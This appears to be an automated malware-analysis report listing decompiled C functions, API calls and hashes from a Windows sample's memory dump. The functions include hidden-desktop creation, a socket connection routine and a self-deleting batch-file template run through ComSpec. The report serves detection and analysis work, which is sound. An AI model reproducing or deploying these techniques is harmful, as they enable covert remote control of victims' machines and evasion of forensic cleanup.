			E0042789F(void* __eax, intOrPtr* __ebx, signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				void* _v60;
				void* _v64;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char _v92;
				long _v96;
				signed short _v100;
				void* _v104;
				intOrPtr _v108;
				signed int _v117;
				void* __esi;
				void* _t147;
				intOrPtr _t148;
				struct HWND__* _t150;
				signed int _t152;
				signed int _t154;
				signed int _t156;
				signed short _t161;
				signed short _t165;
				signed short _t168;
				signed short _t171;
				signed int _t177;
				struct HWND__* _t178;
				signed short _t179;
				signed short _t181;
				signed short _t183;
				intOrPtr _t187;
				signed char _t195;
				signed int _t199;
				long _t205;
				signed short _t228;
				signed int _t232;
				signed short _t252;
				struct HWND__* _t258;
				struct HWND__* _t259;
				void* _t261;
				intOrPtr _t263;
				signed int _t267;
				void* _t269;

				_t147 = __eax +  *__ebx +  *((intOrPtr*)(__eax +  *__ebx + 0x6060606));
				_push(es);
				_push(es);
				_push(es);
				 *__ecx =  *__ecx | __ecx;
				es = es;
				_v117 = _v117 | __edx;
				_t269 = (_t267 & 0xfffffff8) - 0x54;
				_push(__ebx);
				_t261 = _t147;
				_t148 =  *((intOrPtr*)(_t261 + 0x10));
				_t232 = 0;
				_v96 = 0;
				if( *((intOrPtr*)(_t148 + 0x110)) == 0) {
					_t205 =  *((intOrPtr*)(_t148 + 0x108));
					_v96 = _t205;
					if(_t205 != 0) {
						_t228 = 0;
						if(( *(_t148 + 1) & 0x00000080) != 0) {
							_t228 = 1;
						}
						if(( *(_t148 + 2) & 0x00000080) != 0) {
							_t228 = _t228 | 0x00000002;
						}
						if(( *(_t148 + 4) & 0x00000080) != 0) {
							_t228 = _t228 | 0x00000010;
						}
						if(( *(_t148 + 0x10) & 0x00000080) != 0) {
							_t228 = _t228 | 0x00000004;
						}
						if(( *(_t148 + 0x11) & 0x00000080) != 0) {
							_t228 = _t228 | 0x00000008;
						}
						_t232 = _t228 & 0x0000ffff;
					}
					_t195 = _a4;
					_v92 = _t232;
				} else {
					_t195 = _a4;
					if((_t195 & 0x00000001) != 0) {
						E00427350(_a12, _a8, _t261);
						_t195 = _t195 & 0xfffffffe;
						_a4 = _t195;
					}
					if((_t195 & 0x00000004) != 0) {
						WaitForSingleObject( *(_t261 + 0x14), 0xffffffff);
						_t187 =  *((intOrPtr*)(_t261 + 0x10));
						_t259 =  *(_t187 + 0x108);
						 *((intOrPtr*)(_t187 + 0x10c)) = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x10)) + 0x108)) = 0;
						 *((short*)( *((intOrPtr*)(_t261 + 0x10)) + 0x110)) = 0;
						ReleaseMutex( *(_t261 + 0x14));
						if(IsWindow(_t259) != 0) {
							PostMessageW(_t259, 0x215, 0, 0);
						}
					}
				}
				 *( *((intOrPtr*)(_t261 + 0x10)) + 0x100) = _a8;
				_t150 = _a12;
				 *( *((intOrPtr*)(_t261 + 0x10)) + 0x104) = _t150;
				if(_t195 == 0) {
					L90:
					return _t150;
				} else {
					_t152 = _t195 & 0x00000002;
					_v88 = _t152;
					if(_t152 == 0) {
						if((_t195 & 0x00000004) == 0) {
							L26:
							_t154 = _t195 & 0x00000020;
							_v84 = _t154;
							if(_t154 == 0) {
								if((_t195 & 0x00000040) == 0) {
									L31:
									_t156 = _t195 & 0x00000008;
									_v80 = _t156;
									if(_t156 == 0) {
										if((_t195 & 0x00000010) == 0) {
											L36:
											_t258 = E00416F00(0x64,  &_v100,  *( *((intOrPtr*)(_t261 + 0x10)) + 0x100),  *( *((intOrPtr*)(_t261 + 0x10)) + 0x104));
											if(_v108 + 0xfffffff6 <= 7) {
												_t177 = GetWindowLongW(_t258, 0xfffffff0);
												if((_t177 & 0x40000000) != 0 && (_t177 & 0x00c00000) != 0xc00000 && (_t177 & 0x80040000) == 0) {
													_t178 = GetParent(_t258);
													if(_t178 != 0) {
														_t258 = _t178;
													}
												}
											}
											if(_t258 == 0) {
												L47:
												_t150 = _v96;
												if(_t150 != 0) {
													_t150 = IsWindow(_t150);
													if(_t150 == 0 || _t258 != 0 && _v96 != _t258 && (_v92 & 0x00000007) == 0) {
														if(_t195 != 0x8001) {
															_t150 = E004272D0(0, _t261, 0, 0, 1);
														}
													} else {
														_t258 = _v96;
														_v100 = 1;
													}
												}
												goto L55;
											} else {
												_t150 = E004260D0(_t258);
												if((_t150 & 0x00000040) == 0) {
													goto L47;
												}
												if(_t258 != _v96) {
													_t150 = E004272D0(_t258, _t261, GetWindowThreadProcessId(_t258, 0), 0, 1);
												}
												_v100 = 1;
												L55:
												if(_t258 == 0) {
													goto L90;
												}
												 *((intOrPtr*)(_t269 + 0x2c)) = 0x3c;
												_t150 = GetWindowInfo(_t258, _t269 + 0x24);
												if(_t150 == 0) {
													goto L90;
												}
												_t150 = _a8 & 0x0000ffff;
												_t199 = (_a12 & 0x0000ffff) << 0x00000010 | _t150;
												_v96 = _t199;
												if(_v100 != 1) {
													_t199 = _v80;
												} else {
													_t150 = E004260D0(_t258);
													if((_t150 & 0x00000020) == 0) {
														_t150 = _a8 -  *((intOrPtr*)(_t269 + 0x38));
														_t199 = (_a12 -  *((intOrPtr*)(_t269 + 0x3c)) & 0x0000ffff) << 0x00000010 | _t150 & 0x0000ffff;
													}
												}
												if(_v88 == 0) {
													if((_a4 & 0x00000004) == 0) {
														goto L66;
													}
													_push(_v96);
													_push(_t199);
													_push(0xa2);
													_push(_v100);
													_t171 = 0x202;
													goto L65;
												} else {
													_push(_v96);
													_push(_t199);
													_push(0xa1);
													_push(_v100);
													_t171 = 0x201;
													L65:
													_push(_t269 + 0x34);
													_t150 = E004275A0(_t171, _t261);
													L66:
													if(_v84 == 0) {
														if((_a4 & 0x00000040) == 0) {
															L71:
															if(_v80 == 0) {
																if((_a4 & 0x00000010) == 0) {
																	L76:
																	if((_a4 & 0x00000001) != 0) {
																		_t150 = E004275A0(0x200, _t261, _t269 + 0x34, _v100, 0xa0, _t199, _v96);
																	}
																	if((_a4 & 0x00000800) != 0) {
																		_t263 =  *((intOrPtr*)(_t261 + 0x10));
																		_t161 = 0;
																		if(( *(_t263 + 1) & 0x00000080) != 0) {
																			_t161 = 1;
																		}
																		if(( *(_t263 + 2) & 0x00000080) != 0) {
																			_t161 = _t161 | 0x00000002;
																		}
																		if(( *(_t263 + 4) & 0x00000080) != 0) {
																			_t161 = _t161 | 0x00000010;
																		}
																		if(( *(_t263 + 0x10) & 0x00000080) != 0) {
																			_t161 = _t161 | 0x00000004;
																		}
																		if(( *(_t263 + 0x11) & 0x00000080) != 0) {
																			_t161 = _t161 | 0x00000008;
																		}
																		_t150 = PostMessageW(_t258, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | _t161 & 0x0000ffff, _v96);
																	}
																	goto L90;
																}
																_push(_v96);
																_push(_t199);
																_push(0xa5);
																_push(_v100);
																_t165 = 0x205;
																L75:
																_push(_t269 + 0x34);
																_t150 = E004275A0(_t165, _t261);
																goto L76;
															}
															_push(_v96);
															_push(_t199);
															_push(0xa4);
															_push(_v100);
															_t165 = 0x204;
															goto L75;
														}
														_push(_v96);
														_push(_t199);
														_push(0xa8);
														_push(_v100);
														_t168 = 0x208;
														L70:
														_push(_t269 + 0x34);
														_t150 = E004275A0(_t168, _t261);
														goto L71;
													}
													_push(_v96);
													_push(_t199);
													_push(0xa7);
													_push(_v100);
													_t168 = 0x207;
													goto L70;
												}
											}
										}
										_t179 = 0;
										L35:
										E004265F0(_t179, _t261, 2);
										goto L36;
									}
									_t179 = 1;
									goto L35;
								}
								_t181 = 0;
								L30:
								E004265F0(_t181, _t261, 4);
								goto L31;
							}
							_t181 = 1;
							goto L30;
						}
						_t183 = 0;
						_t252 = 1;
						L25:
						E004265F0(_t183, _t261, _t252);
						goto L26;
					}
					_t183 = 1;
					_t252 = 1;
					goto L25;
				}
			}

0x004278a1
0x004278a8
0x004278a9
0x004278aa
0x004278ac
0x004278ae
0x004278af
0x004278b6
0x004278b9
0x004278bb
0x004278bd
0x004278c0
0x004278c3
0x004278ce
0x0042794b
0x00427951
0x00427957
0x00427959
0x0042795f
0x00427961
0x00427961
0x0042796a
0x0042796c
0x0042796c
0x00427973
0x00427975
0x00427975
0x0042797c
0x0042797e
0x0042797e
0x00427985
0x00427987
0x00427987
0x0042798a
0x0042798a
0x0042798d
0x00427990
0x004278d0
0x004278d0
0x004278d6
0x004278e0
0x004278e5
0x004278e8
0x004278e8
0x004278ee
0x004278fa
0x00427900
0x00427903
0x0042790b
0x00427914
0x0042791d
0x00427928
0x00427937
0x00427943
0x00427943
0x00427937
0x004278ee
0x0042799a
0x004279a3
0x004279a6
0x004279ae
0x00427cae
0x00427cb4
0x004279b4
0x004279b6
0x004279b9
0x004279bd
0x004279c8
0x004279d5
0x004279d7
0x004279da
0x004279de
0x004279e7
0x004279f4
0x004279f6
0x004279f9
0x004279fd
0x00427a06
0x00427a13
0x00427a32
0x00427a3e
0x00427a43
0x00427a4e
0x00427a68
0x00427a70
0x00427a72
0x00427a72
0x00427a70
0x00427a4e
0x00427a76
0x00427aa8
0x00427aa8
0x00427aae
0x00427ab1
0x00427ab9
0x00427ae0
0x00427aea
0x00427aea
0x00427acc
0x00427acc
0x00427ad0
0x00427ad0
0x00427ab9
0x00000000
0x00427a78
0x00427a7a
0x00427a81
0x00000000
0x00000000
0x00427a87
0x00427a99
0x00427a99
0x00427a9e
0x00427aef
0x00427af1
0x00000000
0x00000000
0x00427afd
0x00427b05
0x00427b0d
0x00000000
0x00000000
0x00427b17
0x00427b1e
0x00427b25
0x00427b29
0x00427b51
0x00427b2b
0x00427b2d
0x00427b34
0x00427b43
0x00427b4d
0x00427b4d
0x00427b34
0x00427b5a
0x00427b77
0x00000000
0x00000000
0x00427b81
0x00427b82
0x00427b83
0x00427b88
0x00427b89
0x00000000
0x00427b5c
0x00427b64
0x00427b65
0x00427b66
0x00427b6b
0x00427b6c
0x00427b8e
0x00427b92
0x00427b97
0x00427b9c
0x00427ba1
0x00427bbe
0x00427be3
0x00427be8
0x00427c05
0x00427c2a
0x00427c2e
0x00427c4e
0x00427c4e
0x00427c5a
0x00427c5c
0x00427c5f
0x00427c65
0x00427c67
0x00427c67
0x00427c70
0x00427c72
0x00427c72
0x00427c79
0x00427c7b
0x00427c7b
0x00427c82
0x00427c84
0x00427c84
0x00427c8b
0x00427c8d
0x00427c8d
0x00427ca8
0x00427ca8
0x00000000
0x00427c5a
0x00427c0f
0x00427c10
0x00427c11
0x00427c16
0x00427c17
0x00427c1c
0x00427c20
0x00427c25
0x00000000
0x00427c25
0x00427bf2
0x00427bf3
0x00427bf4
0x00427bf9
0x00427bfa
0x00000000
0x00427bfa
0x00427bc8
0x00427bc9
0x00427bca
0x00427bcf
0x00427bd0
0x00427bd5
0x00427bd9
0x00427bde
0x00000000
0x00427bde
0x00427bab
0x00427bac
0x00427bad
0x00427bb2
0x00427bb3
0x00000000
0x00427bb3
0x00427b5a
0x00427a76
0x00427a08
0x00427a0a
0x00427a0e
0x00000000
0x00427a0e
0x004279ff
0x00000000
0x004279ff
0x004279e9
0x004279eb
0x004279ef
0x00000000
0x004279ef
0x004279e0
0x00000000
0x004279e0
0x004279ca
0x004279cc
0x004279ce
0x004279d0
0x00000000
0x004279d0
0x004279bf
0x004279c1
0x00000000
0x004279c1

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004278FA
ReleaseMutex.KERNEL32(?), ref: 00427928
IsWindow.USER32(?), ref: 0042792F
PostMessageW.USER32(?,00000215,00000000,00000000), ref: 00427943
GetWindowLongW.USER32(00000000,000000F0), ref: 00427A43
GetParent.USER32(00000000), ref: 00427A68
GetWindowThreadProcessId.USER32(?,00000000), ref: 00427A8C
GetWindowInfo.USER32 ref: 00427B05

Part of subcall function 00427350: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,004278E5), ref: 00427363
Part of subcall function 00427350: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,004278E5), ref: 00427381
Part of subcall function 00427350: GetWindowRect.USER32 ref: 00427391
Part of subcall function 00427350: IsRectEmpty.USER32(?), ref: 00427414
Part of subcall function 00427350: GetWindowLongW.USER32(?,000000F0), ref: 00427425
Part of subcall function 00427350: GetParent.USER32(?), ref: 0042743A
Part of subcall function 00427350: MapWindowPoints.USER32 ref: 00427443
Part of subcall function 00427350: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C,?,?,?,?,?,?,?,004278E5), ref: 00427469

Strings

<, xrefs: 00427AFD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
String ID: <
API String ID: 4123185898-4251816714
Opcode ID: 742c429bee1dab4f2491ddd83dc28e33b8f6c1512944fe170b6816dec62195c3
Instruction ID: c03bbf8dba2acee17e1bd3899f2dbc880ef7be3be0d35897cbb258a25c6cef1b
Opcode Fuzzy Hash: 742c429bee1dab4f2491ddd83dc28e33b8f6c1512944fe170b6816dec62195c3
Instruction Fuzzy Hash: 8691C1B03083109BE724CF28E885B7B77E5AF85314F548A2EF89587391C778D845C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00414D70, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 138
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00414D70(signed int __eax, void* __edx) {
				void* __edi;
				signed int _t24;
				void* _t25;
				void* _t35;
				void* _t40;
				void* _t50;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t50 = 0;
				asm("rol ax, 0x8");
				_t24 = __eax & 0x0000ffff;
				 *(_t58 + 0x20) = _t24;
				_t57 = 0;
				 *((intOrPtr*)(_t58 + 0x18)) = 0;
				__imp__getaddrinfo(__edx, 0, 0, _t58 + 0xc);
				if(_t24 == 0) {
					_t40 =  *(_t58 + 0x10);
					_push(_t54);
					if(_t40 != 0) {
						do {
							_t24 =  *(_t40 + 4);
							if(_t24 != 2) {
								if(_t24 == 0x17) {
									_t54 =  *(_t40 + 0x10);
									_t53 =  *((intOrPtr*)(_t40 + 0x18));
									if(_t54 != 0) {
										_t24 = HeapAlloc( *0x42e6d4, 0, _t54 + 4);
										if(_t24 != 0) {
											_t24 = E00410820(_t24, _t53, _t54);
										}
									} else {
										_t24 = 0;
									}
									 *(_t58 + 0x10) = _t24;
								}
							} else {
								_t54 =  *(_t40 + 0x10);
								_t52 =  *((intOrPtr*)(_t40 + 0x18));
								if(_t54 != 0) {
									_t24 = HeapAlloc( *0x42e6d4, 0, _t54 + 4);
									if(_t24 != 0) {
										_t24 = E00410820(_t24, _t52, _t54);
									}
									_t57 = _t24;
								} else {
									_t24 = 0;
									_t57 = 0;
								}
							}
							_t40 =  *(_t40 + 0x1c);
						} while (_t40 != 0);
						_t40 =  *(_t58 + 0x14);
						_t50 =  *(_t58 + 0x10);
					}
					__imp__freeaddrinfo(_t40);
					_t55 = _t54 | 0xffffffff;
					if(_t57 != 0) {
						 *((short*)(_t57 + 2)) =  *((intOrPtr*)(_t58 + 0x18));
						__imp__#23( *_t57 & 0x0000ffff, 1, 6);
						_t55 = _t24;
						if(_t55 != 0xffffffff) {
							_t35 = ((0 |  *_t57 != 0x00000002) - 0x00000001 & 0xfffffff4) + 0x1c;
							__imp__#4(_t55, _t57, _t35);
							if(_t35 != 0) {
								__imp__#3(_t55);
								_t55 = _t55 | 0xffffffff;
							}
						}
					}
					if(_t50 != 0 && _t55 == 0xffffffff) {
						 *((short*)(_t50 + 2)) =  *((intOrPtr*)(_t58 + 0x18));
						_t55 = E00414D20(_t50);
					}
					if(_t57 != 0) {
						HeapFree( *0x42e6d4, 0, _t57);
					}
					_t25 =  *(_t58 + 0x10);
					if(_t25 != 0) {
						HeapFree( *0x42e6d4, 0, _t25);
					}
					return _t55;
				} else {
					return _t24 | 0xffffffff;
				}
			}

0x00414d7a
0x00414d7c
0x00414d81
0x00414d86
0x00414d8a
0x00414d8c
0x00414d90
0x00414d98
0x00414da4
0x00414da8
0x00414dab
0x00414db1
0x00414db1
0x00414db7
0x00414def
0x00414df1
0x00414df4
0x00414df9
0x00414e0b
0x00414e13
0x00414e18
0x00414e18
0x00414dfb
0x00414dfb
0x00414dfb
0x00414e1d
0x00414e1d
0x00414db9
0x00414db9
0x00414dbc
0x00414dc1
0x00414dd6
0x00414dde
0x00414de3
0x00414de3
0x00414de8
0x00414dc3
0x00414dc3
0x00414dc5
0x00414dc5
0x00414dc1
0x00414e21
0x00414e24
0x00414e28
0x00414e2c
0x00414e2c
0x00414e31
0x00414e37
0x00414e3c
0x00414e4c
0x00414e50
0x00414e56
0x00414e5b
0x00414e6b
0x00414e71
0x00414e79
0x00414e7c
0x00414e82
0x00414e82
0x00414e79
0x00414e5b
0x00414e87
0x00414e93
0x00414e9c
0x00414e9c
0x00414ea6
0x00414eb2
0x00414eb2
0x00414eb4
0x00414eba
0x00414ec5
0x00414ec5
0x00414ed0
0x00414d9b
0x00414da2
0x00414da2

APIs

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00414D90
freeaddrinfo.WS2_32(?,?), ref: 00414E31
socket.WS2_32(?,00000001,00000006), ref: 00414E50
connect.WS2_32(00000000,00000000,-0000001D), ref: 00414E71
closesocket.WS2_32(00000000), ref: 00414E7C
HeapFree.KERNEL32(?,00000000,00000000), ref: 00414EB2
HeapFree.KERNEL32(?,00000000,?), ref: 00414EC5

Strings

p0u, xrefs: 00414E7C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$closesocketconnectfreeaddrinfogetaddrinfosocket
String ID: p0u
API String ID: 2777671283-1742372003
Opcode ID: be89eeb97121b25d7678b7b4fc421a7b5dbd7d02bbd2fd6bd5b6837b118d9cbb
Instruction ID: 5a1f4fe44d53415d2eccfaf263b573818f3d3c5b3d59e2ed5ecb5855f9409c42
Opcode Fuzzy Hash: be89eeb97121b25d7678b7b4fc421a7b5dbd7d02bbd2fd6bd5b6837b118d9cbb
Instruction Fuzzy Hash: BB41E2716003116BCB20EF65AC84AAB77A8FBD4760F044A29FD55E7290E738D981C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 004268C0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 124
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004268C0(void* __eflags, intOrPtr _a4) {
				char _v672;
				char _v800;
				char _v820;
				char _v832;
				intOrPtr _v848;
				char _v1200;
				char _v1304;
				char _v1316;
				char _v1336;
				char _v1396;
				char* _v1400;
				intOrPtr _v1404;
				void* _v1408;
				void* _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				char _v1424;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed int _t52;
				signed int _t56;
				signed int _t63;
				signed int _t64;
				void* _t82;
				void* _t83;

				_t83 = __eflags;
				SetThreadPriority(GetCurrentThread(), 1);
				E0041D150( &_v800);
				E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v1304, 0);
				if(E0041A370( &_v1316, _t83) == 0) {
					L3:
					return 0;
				} else {
					_t80 =  &_v1200;
					_t43 = E00426210( &_v1200, 1);
					if(_t43 != 0) {
						__imp__GetShellWindow();
						__eflags = _t43;
						_t64 = _t63 & 0xffffff00 | _t43 != 0x00000000;
						__eflags = _t64;
						if(_t64 == 0) {
							_t81 =  &_v1424;
							_t50 = E00424100(0xa8,  &_v1424);
							__imp__SHGetFolderPathW(0, 0x25, 0, 0,  &_v800);
							__eflags = _t50;
							if(_t50 == 0) {
								_t52 = E004188B0(_t81,  &_v820,  &_v820);
								__eflags = _t52;
								if(_t52 != 0) {
									_t78 =  &_v1396;
									E00410870(_t52,  &_v1396, 0, 0x44);
									_v1400 =  &_v1336;
									_v1408 = 0x44;
									_t56 = E00412BF0(0,  &_v832, 0, _t78,  &_v1424);
									__eflags = _t56;
									if(_t56 != 0) {
										_t82 = _v1412;
										WaitForSingleObject(_t82, 0x1388);
										CloseHandle(_v1408);
										CloseHandle(_t82);
										_t64 = 1;
									}
								}
							}
						}
						SystemParametersInfoW(0x1003, 0, 0, 0);
						__eflags = _t64 - 1;
						if(_t64 == 1) {
							_push(_v848);
							_v1424 =  &_v1200;
							_push(_v1200);
							_push( &_v1424);
							_push(_a4);
							_v1420 = 0x426800;
							_v1416 = 0x426810;
							_v1412 = E00426820;
							_v1408 = E00426850;
							_v1404 = E00426860;
							_v1400 = E004268A0;
							_v1396 = 0x426800;
							E00406350();
						}
						E004264F0( &_v1200, 1);
						return _t64;
					} else {
						E004264F0(_t80, 1);
						goto L3;
					}
				}
			}

0x004268c0
0x004268d2
0x004268df
0x00426906
0x00426919
0x00426936
0x00426941
0x0042691b
0x0042691d
0x00426924
0x0042692b
0x00426944
0x0042694a
0x0042694c
0x0042694f
0x00426951
0x00426957
0x00426960
0x00426975
0x0042697b
0x0042697d
0x0042698c
0x00426991
0x00426993
0x00426999
0x0042699e
0x004269b0
0x004269bf
0x004269c7
0x004269cc
0x004269ce
0x004269d0
0x004269da
0x004269eb
0x004269ee
0x004269f0
0x004269f0
0x004269ce
0x00426993
0x0042697d
0x004269fd
0x00426a03
0x00426a06
0x00426a16
0x00426a25
0x00426a29
0x00426a2e
0x00426a2f
0x00426a30
0x00426a38
0x00426a40
0x00426a48
0x00426a50
0x00426a58
0x00426a60
0x00426a68
0x00426a68
0x00426a76
0x00426a86
0x0042692d
0x00426931
0x00000000
0x00426931
0x0042692b

APIs

GetCurrentThread.KERNEL32 ref: 004268CB
SetThreadPriority.KERNEL32(00000000), ref: 004268D2

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

Part of subcall function 0041A370: OpenWindowStationW.USER32 ref: 0041A393
Part of subcall function 0041A370: CreateWindowStationW.USER32 ref: 0041A3A9
Part of subcall function 0041A370: GetProcessWindowStation.USER32(?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A3B5
Part of subcall function 0041A370: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041A3E7
Part of subcall function 0041A370: CreateDesktopW.USER32 ref: 0041A3FD
Part of subcall function 0041A370: CloseDesktop.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A412
Part of subcall function 0041A370: CloseWindowStation.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A42B

Part of subcall function 00426210: TlsAlloc.KERNEL32(0042EEA0,00000000,0000018C,00000000,77E49EB0,00000000), ref: 00426227

GetShellWindow.USER32 ref: 00426944
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00426975
WaitForSingleObject.KERNEL32(?,00001388), ref: 004269DA
CloseHandle.KERNEL32(?), ref: 004269EB
CloseHandle.KERNEL32(?), ref: 004269EE
SystemParametersInfoW.USER32 ref: 004269FD

Part of subcall function 004264F0: DeleteObject.GDI32(?), ref: 00426503
Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426513
Part of subcall function 004264F0: TlsFree.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042651E
Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042652C
Part of subcall function 004264F0: UnmapViewOfFile.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426536
Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426543
Part of subcall function 004264F0: SelectObject.GDI32(?,?), ref: 00426562
Part of subcall function 004264F0: DeleteObject.GDI32(?), ref: 00426573
Part of subcall function 004264F0: DeleteDC.GDI32(?), ref: 00426580
Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426591
Part of subcall function 004264F0: WaitForSingleObject.KERNEL32(?,00000000,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265A0
Part of subcall function 004264F0: PostThreadMessageW.USER32 ref: 004265BA
Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265D1
Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265DA

Strings

D, xrefs: 004269BF
pB, xrefs: 00426901

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Handle$ObjectWindow$Station$DeleteDesktopThread$CreateOpenSingleWait$AllocCurrentFileFolderFreeFromInfoMessageParametersPathPostPriorityProcessSelectShellStringSystemUnmapView
String ID: D$pB
API String ID: 2998749583-3244306929
Opcode ID: 20da6ed3f8bafa0548b7b7867449c2d421620ef50f1a5a76dd23c4af9ad01b9c
Instruction ID: a5a4172f029ea8df0589d0bbb2d35d018abd928581834061967204759e9073cf
Opcode Fuzzy Hash: 20da6ed3f8bafa0548b7b7867449c2d421620ef50f1a5a76dd23c4af9ad01b9c
Instruction Fuzzy Hash: 1041E971345350ABD320EB51DD45FDB77E4ABC4704F80482EFA8497190DBB898498BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00412E80, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 92
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00412E80() {
				intOrPtr _v0;
				char _v548;
				char _v812;
				char _v1328;
				short _v1332;
				char _v1344;
				short _v1368;
				intOrPtr _v1372;
				char _v1404;
				void* _v1408;
				intOrPtr _v1416;
				void* __edi;
				void* __esi;
				void* _t19;
				long _t31;
				void* _t39;
				WCHAR* _t50;
				void* _t51;

				_push(L"bat");
				_t50 =  &_v1328;
				_t19 = E004181D0(_t50);
				_t56 = _t19;
				if(_t19 == 0) {
					L9:
					__eflags = 0;
					return 0;
				} else {
					CharToOemW(_t50,  &_v812);
					_push( &_v812);
					if(E00411E70(_t56,  &_v1408, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _v0) == 0xffffffff) {
						L8:
						SetFileAttributesW( &_v1332, 0x80);
						DeleteFileW( &_v1332);
						goto L9;
					} else {
						_t51 = _v1408;
						_t39 = E00417FC0(_t50, _t51, _t24);
						if(_t51 != 0) {
							HeapFree( *0x42e6d4, 0, _t51);
						}
						if(_t39 == 0) {
							goto L8;
						} else {
							_push( &_v1332);
							if(E00411D10( &_v1332, 0x10e,  &_v548, L"/c \"%s\"") <= 0xffffffff) {
								goto L8;
							} else {
								_t31 = GetEnvironmentVariableW(L"ComSpec",  &_v1332, 0x104);
								_t32 = _t31 - 1;
								if(_t31 - 1 > 0x102) {
									goto L8;
								} else {
									E00410870(_t32,  &_v1404, 0, 0x44);
									_v1368 = 0;
									_v1416 = 0x44;
									_v1372 = 1;
									return E00412BF0( &_v548,  &_v1344, 0,  &_v1404, 0) & 0xffffff00 | _t36 != 0x00000000;
								}
							}
						}
					}
				}
			}

0x00412e89
0x00412e8e
0x00412e92
0x00412e97
0x00412e99
0x00412fa7
0x00412fa7
0x00412fb0
0x00412e9f
0x00412eaa
0x00412ebe
0x00412ed5
0x00412f8a
0x00412f94
0x00412f9f
0x00000000
0x00412edb
0x00412edb
0x00412ee6
0x00412eea
0x00412ef6
0x00412ef6
0x00412efe
0x00000000
0x00412f04
0x00412f08
0x00412f25
0x00000000
0x00412f27
0x00412f36
0x00412f3c
0x00412f42
0x00000000
0x00412f44
0x00412f4d
0x00412f58
0x00412f64
0x00412f6c
0x00412f87
0x00412f87
0x00412f42
0x00412f25
0x00412efe
0x00412ed5

APIs

Part of subcall function 004181D0: GetTempPathW.KERNEL32(000000F6,?,?,?,00000000), ref: 004181E6
Part of subcall function 004181D0: GetTickCount.KERNEL32 ref: 00418200
Part of subcall function 004181D0: PathCombineW.SHLWAPI(?,?,?,?,?,?,00000000), ref: 00418264
Part of subcall function 004181D0: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00418281

CharToOemW.USER32 ref: 00412EAA

Part of subcall function 00411E70: HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00000000,?,004078E8,?), ref: 00411EA6

HeapFree.KERNEL32(?,00000000,?,?,00000000), ref: 00412EF6
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,00000000), ref: 00412F36
SetFileAttributesW.KERNEL32(?,00000080), ref: 00412F94
